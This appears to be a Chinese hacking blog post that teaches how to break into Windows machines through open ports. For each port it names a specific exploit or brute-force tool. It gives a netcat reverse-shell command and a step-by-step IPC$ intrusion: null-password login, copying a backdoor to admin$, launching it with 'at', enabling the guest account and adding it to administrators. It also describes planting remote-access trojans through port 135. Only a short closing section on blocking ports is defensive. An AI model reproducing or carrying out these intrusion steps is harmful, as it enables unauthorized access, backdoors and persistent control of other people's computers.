网站端口检测_找到端口如何攻击网站

hacker|
207

如何利用端口进行攻击

1. 1433端口入侵

scanport.exe 查有1433的机器

SQLScanPas*.**e 进行字典暴破(字典是关键)

最后 SQLTool*.**e入侵

对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

(以上反向的,测试成功)

sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2. 4899端口入侵

用4899过滤器.exe,扫描空口令的机器

3. 3899的入侵

对很早的机器,可以试试3389的溢出(win3389ex.exe)

对2000的机器,可以试试字典暴破。(tscrack.exe)

4. 80入侵

对sp3以前的机器,可以用webdav入侵;

对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)

可以利用SQL进行注入。(啊D的注入软件)。

5. serv-u入侵(21端口)

对5. 004及以下系统,可用溢出入侵。(serv5004.exe)

对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)

对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)

输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系统漏洞

利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,

进行溢出入侵。

9. 3127等端口

可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵

利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

经典IPC$入侵

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连

接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名

,输入administrators,命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的

c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3. C:\net time \\127.0.0.1

查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.

5. C:\net time \\127.0.0.1

再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备

开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的

是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打

算建立一个Telnet服务!这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8. C:\WINNT\system32ntlm

输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这

个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使

用"net start telnet"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作

一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我

们可以用guest再次访问这台计算机)

发现对方135端口是开放的,之后怎么进行攻击,越多越好

一般情况下135端口主要用于使用RPC(Remote Procedure Call,远程过程调用) 协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地 执行远程计算机上的代码; 使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135。 下面我就来介绍一下通过135端口入侵的方法。 (1)通过135端口入侵,攻击者首先需要查找网络上存在135端口漏洞的主机地址,在查找此类主机过程中,可以使用一些扫描工具,比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址,然后在“结束”文本框里填写好扫描结束的IP地址,在“扫描类型”选项中选择“所有端口定义”单选按钮,并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后,在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径,把里面有漏洞的IP整理下即可。 (2)得到有漏洞后,我们还有一个功能强大的扫描工具,比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径,在连接共享$处选择“WMI扫描”,在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。 (3)获得漏洞主机用户名以后,我们需要一个开启的工具,那就是Recton v2.5。好了,万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处,以及用户名和密码,不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车,会提示让你输入用户名,把用户名输入后,回车即可进入主机。而且得到的还是SYSTEM权限。 下一步就是为我们加了拥有管理员权限的用户,看看我杰作。最后我们可以上传一些远程性木马软件作为后门,比如灰鸽子,冰河等。在这里我就不在展示。我还是喜欢3389端口,那我就给他上传个开启3389的脚本,不过对于开启3389端口的工具网上还真的不少,比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的。怎么样,就这么轻松得到了一台。是不是很过瘾啊。

网络中怎么实现端口攻击

组策略,IP策略,双击IP策略后面的那四项中的某一项,就是你想设置的那一项,新建IP策略,把新建向导关了,要不很麻烦,下来是IP筛选器,进入后把任意IP就成任意端口,把我的IP定成指定端口,一定要分清TCP,UDP一次只能封一个,这样重复操作,一会儿就完成了;下来退到IP筛选器那一层,选第二个,是设置IP筛选器的,你选禁用,然后退到组策略,把你刚才选的那个右键,选指派,应该就行了,你可以到网上下些资料看看.

再一种是在防火墙里面,把不用的端口放到禁用区就行了,操作和上面说的那个差不多;

再一种是去下一个自动关闭端口的软件,关完后按我最上面说的那个路径找到80端口,把它开放了就行了,这种方法最省力;

先用NET

URSE

-an这个命令看看你都开放了那些端口.

参考资料:

0条大神的评论

发表评论